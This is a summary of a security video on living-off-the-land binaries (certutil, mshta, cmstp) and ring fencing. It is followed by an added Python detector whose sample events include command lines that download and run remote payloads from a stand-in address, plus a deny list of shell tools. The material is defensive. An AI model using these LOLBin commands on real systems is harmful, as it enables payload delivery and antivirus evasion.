
New Video from @collinsinfosec Explores Fileless Malware and Living Off the Land Techniques
In this video, CollinsInfosec explores the concept of "fileless malware" and the "living off the land" (LOL) techniques attackers use to evade antivirus software such as Windows Defender. "Fileless malware" is defined in two ways: first, as malicious code that runs directly in memory rather than as a file on disk, and second, as malicious activity carried out with the operating system's own, legitimately signed tools. The video focuses on the second definition: because these native binaries are trusted by default, an attacker can act through them without dropping an obvious malicious file for a signature-based scanner to find.

The author demonstrates three LOL binaries (LOLBins) commonly seen in attack chains: certutil.exe, mshta.exe, and cmstp.exe. Certutil.exe is the Windows certificate services utility; because it can fetch and cache content from a URL, it can be abused to download a payload. Mshta.exe runs HTML Applications (.hta files), whose embedded script executes with the user's full privileges and outside the browser's security zones, so a remote or inline script can be run as arbitrary code. Cmstp.exe installs Connection Manager service profiles from an INF file; a crafted INF, including one hosted remotely, can make it run arbitrary commands.

To illustrate these techniques, the author uses a simple Python application that invokes the three binaries. He shows that the commands execute even with Windows Defender enabled: the binaries are legitimate, signed Microsoft components, so antivirus that keys on known-bad files has little to flag.

He then introduces "ring fencing" as a mitigation. Ring fencing restricts what a legitimate application is allowed to do and to reach, rather than trying to recognize malicious code. An application like QuickBooks, for example, has no need to launch PowerShell or to create remote desktop profiles, so those actions can be denied to it while the application itself keeps running. The author demonstrates this with an application control policy that limits specific applications to the executables they legitimately need.

With these policies applied, he shows the simulated malicious application being blocked when it tries to launch the LOL binaries, so the dangerous commands never execute. Legitimate software keeps working while the capabilities available to an attacker who compromises it shrink considerably. In conclusion, the video offers a clear walkthrough of "fileless malware" and LOLBin techniques, together with ring fencing as a practical defense, and shows how both apply in real-world scenarios to strengthen a system against attack.
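The following Python example is added here to make both halves of the video concrete; it is not code from the video or its author. It evaluates process-creation events (the fields mirror what a Sysmon-style process-creation log records, but the events themselves are constructed for this example) in two ways: a set of heuristic rules that flag the abuse patterns of certutil.exe, mshta.exe and cmstp.exe described above, and a ring-fencing rule in the spirit of the QuickBooks example, which denies a fenced parent application the right to launch PowerShell, the remote desktop client and the LOLBins. The QuickBooks executable name, the blocked-child list and the command-line patterns are assumptions for illustration, not a vendor's policy or the video's own rules.

```python
"""Ring-fence policy and LOLBin heuristics over constructed process-creation events.

Added illustration, not the video's code. Event fields, sample events and the
QuickBooks executable name (QBW.EXE) are assumptions made for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    parent_image: str   # full path of the process that spawned the child
    image: str          # full path of the launched binary
    command_line: str   # command line of the launched binary


# LOLBin heuristics: (name, image pattern, command-line pattern). Each flags a
# signed Microsoft binary doing something its everyday use rarely involves.
LOLBIN_RULES = [
    # certutil -urlcache ... -f <url>: fetch-and-cache used as a downloader
    ("certutil download", re.compile(r"\\certutil\.exe$", re.I),
     re.compile(r"(?=.*-urlcache\b)(?=.*(?:\s-f\b|https?://))", re.I)),
    # mshta pointed at a remote HTA or an inline javascript:/vbscript: payload
    ("mshta remote or inline script", re.compile(r"\\mshta\.exe$", re.I),
     re.compile(r"https?://|javascript:|vbscript:", re.I)),
    # cmstp run silently without a desktop icon (/s /ni), or fed a UNC/remote INF
    ("cmstp INF execution", re.compile(r"\\cmstp\.exe$", re.I),
     re.compile(r"(?=.*\s/ni\b)(?=.*\s/s\b)|\\\\\S+\.inf\b|https?://\S+\.inf\b", re.I)),
]


@dataclass
class FenceRule:
    app_pattern: re.Pattern           # the fenced (parent) application
    blocked_children: List[re.Pattern]  # executables it may never launch


# Assumed ring fence: an accounting application has no business starting a
# shell, the RDP client (mstsc.exe) or any of the LOLBins above.
RING_FENCE = [
    FenceRule(
        re.compile(r"\\qbw\.exe$", re.I),
        [re.compile(r"\\(powershell|pwsh|cmd|mstsc|certutil|mshta|cmstp|"
                    r"wscript|cscript|rundll32|regsvr32)\.exe$", re.I)],
    ),
]


def check_lolbin(ev: ProcEvent) -> Optional[str]:
    """Return the name of the first matching LOLBin heuristic, or None."""
    for name, image_re, cmd_re in LOLBIN_RULES:
        if image_re.search(ev.image) and cmd_re.search(ev.command_line):
            return name
    return None


def check_ring_fence(ev: ProcEvent) -> Optional[str]:
    """Return a denial reason if a fenced parent launches a blocked child."""
    for rule in RING_FENCE:
        if rule.app_pattern.search(ev.parent_image):
            for child in rule.blocked_children:
                if child.search(ev.image):
                    return f"{ev.parent_image} is not permitted to launch {ev.image}"
    return None


def evaluate(ev: ProcEvent) -> dict:
    """Ring fence decides allow/block; LOLBin heuristics add an alert otherwise."""
    fence = check_ring_fence(ev)
    lolbin = check_lolbin(ev)
    action = "block" if fence else ("alert" if lolbin else "allow")
    return {"image": ev.image, "action": action, "ring_fence": fence, "lolbin": lolbin}


# Constructed sample events (203.0.113.10 is a documentation-range address).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Intuit\QuickBooks\QBW.EXE",
              r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://203.0.113.10/update.exe C:\Users\Public\update.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://203.0.113.10/stage.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -verify C:\Temp\vendor.cer"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /ni /s C:\Users\Public\profile.inf"),
]


def run_samples() -> List[dict]:
    """Evaluate every constructed event and return the verdicts."""
    return [evaluate(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for verdict in run_samples():
        print(f"{verdict['action']:5} {verdict['image']}  "
              f"fence={verdict['ring_fence']}  lolbin={verdict['lolbin']}")
```

The first event is the video's scenario in miniature: a fenced application tries to use certutil.exe as a downloader, and the ring fence blocks it regardless of whether the heuristic fires. The second and fourth events come from parents that are not fenced, so the policy cannot block them; the heuristics still raise an alert, which is the fallback a defender needs for binaries that legitimately run elsewhere. The third event shows the noise the heuristics are tuned to avoid: certutil.exe verifying a certificate is normal use and passes cleanly.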